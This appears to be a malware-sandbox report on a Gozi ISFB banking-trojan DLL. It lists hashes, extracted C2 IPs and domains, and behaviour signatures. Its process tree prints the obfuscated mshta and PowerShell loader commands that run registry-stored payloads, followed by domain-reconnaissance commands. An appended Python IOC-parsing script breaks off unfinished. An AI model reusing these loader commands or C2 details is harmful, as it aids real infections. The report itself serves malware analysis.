Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-08-2022 10:56

General

  • Target

    8fcfb8f38d8607c57f08f9b39139065f.dll

  • Size

    300KB

  • MD5

    8fcfb8f38d8607c57f08f9b39139065f

  • SHA1

    805bb719009145dcc32b5361abf5bb4d91015dbb

  • SHA256

    ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d

  • SHA512

    6d02b5338e387185520c45a45434bf5e949fdfd66d484459c3e817b76fbfc50621d0fbd5e4e5f3618f02ea257b8d73a53637b7bc791cc40300e837e2de72007f

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings (2 TTPs, 1 IoCs)

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext (5 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network (1 TTPs, 3 IoCs)
  • Enumerates processes with tasklist (1 TTPs, 1 IoCs)
  • Gathers system information (1 TTPs, 1 IoCs)

    Runs systeminfo.exe.

  • Modifies registry class (56 IoCs)
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  • Suspicious behavior: MapViewOfSection (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (48 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3396
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3088
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1952
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3664
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2588
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ratm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ratm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nskttcvte -value gp; new-alias -name cnejji -value iex; cnejji ([System.Text.Encoding]::ASCII.GetString((nskttcvte "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP"
            5⤵
            PID:4544
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4568
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP"
            5⤵
            PID:3680
    • C:\Windows\system32\cmd.exe
      cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4584
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get domain
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3344
      • C:\Windows\system32\more.com
        more
        3⤵
        PID:1984
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
      2⤵
      PID:4752
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4372
    • C:\Windows\system32\cmd.exe
      cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\system32\systeminfo.exe
        systeminfo.exe
        3⤵
        • Gathers system information
        PID:452
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4360
    • C:\Windows\system32\cmd.exe
      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\system32\net.exe
        net view
        3⤵
        • Discovers systems in the same network
        PID:676
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4652
    • C:\Windows\system32\cmd.exe
      cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4836
      • C:\Windows\system32\nslookup.exe
        nslookup 127.0.0.1
        3⤵
        PID:3660
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:3548
    • C:\Windows\system32\cmd.exe
      cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\system32\tasklist.exe
        tasklist.exe /SVC
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:1196
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:3320
    • C:\Windows\system32\cmd.exe
      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:1300
      • C:\Windows\system32\driverquery.exe
        driverquery.exe
        3⤵
        PID:4216
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:2084
    • C:\Windows\system32\cmd.exe
      cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4272
      • C:\Windows\system32\reg.exe
        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
        3⤵
        PID:2836
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:2564
    • C:\Windows\system32\cmd.exe
      cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:1340
      • C:\Windows\system32\net.exe
        net config workstation
        3⤵
        PID:1748
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 config workstation
          4⤵
          PID:1732
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4812
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4748
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts
        3⤵
        PID:4912
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4672
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4768
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts /all_trusts
        3⤵
        PID:5028
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:3792
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:2188
      • C:\Windows\system32\net.exe
        net view /all /domain
        3⤵
        • Discovers systems in the same network
        PID:856
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:956
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4008
      • C:\Windows\system32\net.exe
        net view /all
        3⤵
        • Discovers systems in the same network
        PID:3360
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:4384
    • C:\Windows\system32\cmd.exe
      cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5197.bin1 > C:\Users\Admin\AppData\Local\Temp\5197.bin & del C:\Users\Admin\AppData\Local\Temp\5197.bin1"
      2⤵
      PID:2172
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:3520

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\5197.bin

    Filesize

    64KB

    MD5

    b1978c722926e894cbf897ebf650ba88

    SHA1

    a9bc6f61c7f616d684cb229dd983b4e5ecb02c50

    SHA256

    a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90

    SHA512

    83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      44B

                                                                      MD5

                                                                      f7aea2435aa888b709ca20f816c33bfd

                                                                      SHA1

                                                                      38717c9a73b5f8bd399839cbe0aa57518427e758

                                                                      SHA256

                                                                      f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

                                                                      SHA512

                                                                      1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      6bb53db491181e660601e1440f5dc723

                                                                      SHA1

                                                                      c6691aaad8c7cc09fc3166e38e5c88330c50dae7

                                                                      SHA256

                                                                      3cc045ad8d52f170514010827086ca8963ec144f3a3ec4beaccd3adcd5808f59

                                                                      SHA512

                                                                      56147d208569f30f30cabc3f64c19bde4a40c259e5cb61ab378fe902b902d25c80f055286e5abeb92ecc2e88375a06800e95a4161b63737a09c2d7d0be24092f

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      ba1cacc02ab4d42993da9e2a00150c4e

                                                                      SHA1

                                                                      a27f508c5a3ddd3c702157c07625d57a0ec44d39

                                                                      SHA256

                                                                      9c76797bc60c4811103cf2ca87581d7a68b8b72b3aece21dcf580a69a0acd366

                                                                      SHA512

                                                                      808c4c7105940a7610efd63e07bb4494459c47acd794a2f67a13f38df7fd21f65ad7ff2b970c1874bfe54adb8dcc2b07a11062201139887b09d16ecce0b70070

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      5a48006096bd97eb23923e47e5a81f6a

                                                                      SHA1

                                                                      65d5f9e89cc05c17980eb41b0f609bf3e956bfa7

                                                                      SHA256

                                                                      889d10b8b462027785dea9ab3bfe5f5658cb1169b5f4b77219f0411086bf3e60

                                                                      SHA512

                                                                      2d0913f8e6f597c6bf4561befb168cf9f6ec733125445a611eae7c73ca5861c8c6fc1706519507ab642f29c48616a463b4b558db229d7c2c9ff6dc498f7ecda9

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      eb957e958d464123d032e63278336f4a

                                                                      SHA1

                                                                      327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e

                                                                      SHA256

                                                                      fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013

                                                                      SHA512

                                                                      b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      eb957e958d464123d032e63278336f4a

                                                                      SHA1

                                                                      327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e

                                                                      SHA256

                                                                      fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013

                                                                      SHA512

                                                                      b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      9KB

                                                                      MD5

                                                                      c24e1e3d7e76a3f0190c8285a952ba2d

                                                                      SHA1

                                                                      20789bba0b334b28960a0810bc099fbb5af86618

                                                                      SHA256

                                                                      071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5

                                                                      SHA512

                                                                      c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      9KB

                                                                      MD5

                                                                      c24e1e3d7e76a3f0190c8285a952ba2d

                                                                      SHA1

                                                                      20789bba0b334b28960a0810bc099fbb5af86618

                                                                      SHA256

                                                                      071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5

                                                                      SHA512

                                                                      c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      35KB

                                                                      MD5

                                                                      f2440c2ca7c021d3e23515050be042ea

                                                                      SHA1

                                                                      40dbec088209f383f75822fc17e5cec3c81b61b2

                                                                      SHA256

                                                                      e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a

                                                                      SHA512

                                                                      980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 35KB
  MD5: f2440c2ca7c021d3e23515050be042ea
  SHA1: 40dbec088209f383f75822fc17e5cec3c81b61b2
  SHA256: e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a
  SHA512: 980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: f2eba9bd62ee1de79653a2be84b84e82
  SHA1: 456899ba747afa3ac16412290ea9c6192b426cfd
  SHA256: 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
  SHA512: 3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: f2eba9bd62ee1de79653a2be84b84e82
  SHA1: 456899ba747afa3ac16412290ea9c6192b426cfd
  SHA256: 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
  SHA512: 3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: 2fe5b90568f0224526b668dfce8690fc
  SHA1: ddf7904e71def4524be263292b4d0f7a124021f5
  SHA256: f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0
  SHA512: 7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: 2fe5b90568f0224526b668dfce8690fc
  SHA1: ddf7904e71def4524be263292b4d0f7a124021f5
  SHA256: f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0
  SHA512: 7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: 69d4bb4fafa07be30e9d02f144dd90df
  SHA1: bf7b61a62183d31c1ba7a7c2fcf9cc0f8d24d9a8
  SHA256: 558f6c6bacd134f0a35dd2b278ef66feeb0bec567ebb785aea225dd90f0f564e
  SHA512: 2d64dc657ef2c929b68f861e101aa157ef77bfcf86fa21ddc8ddaa775f578f8a136b84caa6139ba7579689530914e1f0db9ed99455e103467066ba6e6781e80c

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: 7772ff5dc05d71f2ad07ca8f5418a126
  SHA1: b2fd45c5546bfb40cf4d6904a72be5fde97b4dfa
  SHA256: 1d64cbce762611d8d131d1d3b8a43c9f6722b494c3c6e5b20c0d6ae403a2556c
  SHA512: 8f1765b862d9291a13fa130ab2f4e7d096f79fd6431a93d151a1d90f6693b7c0192370c6df9af9d9bcd66264051c548c2199478ca5697cdc7168a0c5aafdfa27

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: 2c329b982cf4084062d6eb587c7520ce
  SHA1: 5c1dd00777651c6822a2d10825a4f2820da2d324
  SHA256: 2f973f40a634ad144626133bd6b6e9d9517427812e342bc2e299fe1b351e7815
  SHA512: 6f7fbcf5f2c776cdbea8213565ba53a417ad88a50220d34b53c588e8c6a2bca2a3eca7580bc97786e794ddc15166df1442f0704e83469f5f48562950131ba046

• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  Filesize: 64KB
  MD5: b1978c722926e894cbf897ebf650ba88
  SHA1: a9bc6f61c7f616d684cb229dd983b4e5ecb02c50
  SHA256: a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90
  SHA512: 83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9

• C:\Users\Admin\AppData\Local\Temp\RES7417.tmp
  Filesize: 1KB
  MD5: 4c841c934fa6a78ccf121587f366d0b6
  SHA1: 5a4488f8d588f94bcd62cc05baca0f9e20520784
  SHA256: 14f38bbad97561638c6a6c0b185183be9b559b2b4e20e43ac7b773b637df46b7
  SHA512: a95e76af847c184bcb0373e553fe7ced8390e54ef76673cf2f5218f26bb5302420807958c51a86333fc40a39cc56986742575b0a133ed7dcc5ce08c6833317ea

• C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp
  Filesize: 1KB
  MD5: 392a9a94fc13026a8f63aba8c69dd50d
  SHA1: bd9cd8fe89cd05eaaf75b8f4f9b32cb6d7d225fa
  SHA256: 64d1ec13e3d608c07beac5c80da5b8b1a9db08d5b3e0ccbdc188f4c1976aee70
  SHA512: 6827d3a3b1d5e29ec226e5ae64f85bf1480c0880ac5642a870cfd24a360368f709c24f390083d8ef4f100c9dff8673a894e171a0d88fcc65aba6da7643544197

• C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.dll
  Filesize: 3KB
  MD5: b7802039aed10976472f4877a76f820e
  SHA1: f678a9ee21f18009e0f0d1ddb984e49d36e34448
  SHA256: b203353eac13acb7f6d839cc66248d8d7b8d0945d653ec97ff3e9fc58882a530
  SHA512: 86433ddeef9a734d635a92a45753f1de23ce9661539709817da4141fb7f6aaedf499c07dbe84908edf197a8a1c8f12471eff9f57654977a8e50f5d5401b7afdc

• C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.dll
  Filesize: 3KB
  MD5: 20304a71733030087e99660755f37ccf
  SHA1: 5a67e4c45d514c3fbec6fb68efa418f01978ec5b
  SHA256: 76f33acda34395c4ed965bd7335187a2f654ce5837141b0de4304f1889c977b3
  SHA512: 3053b927e33a3cf5e95cebf33c59ef417bce62957b492fd34123ae54d80c2c8dec6e116f10cc34e9d72dc1dbb08f8095bb057fa87950e61cf6e327700b3f58d1

• \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP
  Filesize: 652B
  MD5: c4def6b5c560f90a9d42b30035510659
  SHA1: 0d04c1cbda9e499aaa1f2119f0b7b084789e4574
  SHA256: 1983acd2d6ee9b85d6ff05dac77ba2f7790d7716e746e4a60b7737b872f9b0d0
  SHA512: 258532762891cbfa0bed534d1a56afd5c8fab50b47c7a93c550dfb49ceb26ea52a8fcbdd96355d367941f55d7e9fd400a07c5f066522a2c83911a119b2154b1f

• \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.0.cs
  Filesize: 400B
  MD5: aca9704199c51fde14b8bf8165bc2a4c
  SHA1: 789b408ccad29240bd093515cbd19a199ad2c1c8
  SHA256: cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
  SHA512: a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

• \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline
  Filesize: 369B
  MD5: 20b9b70df3d4658141b57560c7c22a38
  SHA1: 0a2352c94ecad22dcba6fa906f67b78dcf3deedc
  SHA256: c4e57ab90f35af1c50c0ef56cce03a0afbe88f25580ce341517b7090bddadbb5
  SHA512: 4a114c5d889ce18baace7eaea951133fb1f3f4527347932557ef332119973f1251ae1617cd1c068fd7ca73872532424f884e836ce4479f6c0c0e816b027a9aba

• \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP
  Filesize: 652B
  MD5: ba06d89e40a9d3b36e8ac118ce494371
  SHA1: bb93c0c2d25fcdaf02373900cc54ccf82a14a3f6
  SHA256: fbae2576c9c385dd1d1c62b801ef45b5da0cd382223961289a7affba52a35393
  SHA512: 9b190f0b9e1101bc069105cd1f85683780808fc646f1ba207bc28632bc6af948144952b52be0fb7c4f3116514c6dadeba32c45d5fd2ef445eb387cb021eb9c9d

• \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.0.cs
  Filesize: 410B
  MD5: 9a10482acb9e6952b96f4efc24d9d783
  SHA1: 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
  SHA256: a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
  SHA512: e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

• \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline
  Filesize: 369B
  MD5: 12ecb4fb620b5882813954a0dd3bbe0c
  SHA1: 8c047cfed98be681a04acc40e09928d52eab01c7
  SHA256: b97bdb663a1661bbaa1f4702bbb32a0dd4c86b19cdf9901be415c16e68489a31
  SHA512: c7a0e26b9f4ce49b05b49b1781ee34e952f493d1e6b9af284ca1a6ba200fff63c1a55630b9abc1baebb48c53d4f33a18b8822bccda6692e375a490f88b5b0833
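The dropped-file list above is the part of a report an analyst most often has to turn into usable IOCs. The following Python script is an added example, not part of this report and not the sandbox's own tooling. It parses entries in the bullet/label/value layout used on this page into records, collapses the repeated writes of identical content (several 5197.bin1 entries share the same hashes), and flags the `%TEMP%\<8 random chars>\<same 8 chars>.0.cs` / `.cmdline` / `.dll` plus `CSC<hex>.TMP` cluster, which is the on-disk footprint PowerShell's Add-Type leaves when it drives csc.exe and is consistent with the afgiuia5 and w3dxaopk entries here. The sample input is constructed from a subset of this page's entries; the function, class and regex names are my own.

```python
# Added example, not part of the report: parse dropped-file entries, dedupe by
# SHA-256 and flag the PowerShell Add-Type / csc.exe compile-artifact cluster.
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample input: a subset of this report's dropped-file entries.
SAMPLE = r"""
• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  MD5: f2eba9bd62ee1de79653a2be84b84e82
  SHA256: 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  MD5: f2eba9bd62ee1de79653a2be84b84e82
  SHA256: 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
• C:\Users\Admin\AppData\Local\Temp\5197.bin1
  MD5: 2fe5b90568f0224526b668dfce8690fc
  SHA256: f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0
• C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.dll
  MD5: b7802039aed10976472f4877a76f820e
  SHA256: b203353eac13acb7f6d839cc66248d8d7b8d0945d653ec97ff3e9fc58882a530
• \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP
  MD5: c4def6b5c560f90a9d42b30035510659
  SHA256: 1983acd2d6ee9b85d6ff05dac77ba2f7790d7716e746e4a60b7737b872f9b0d0
• \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.0.cs
  MD5: aca9704199c51fde14b8bf8165bc2a4c
  SHA256: cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
• \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline
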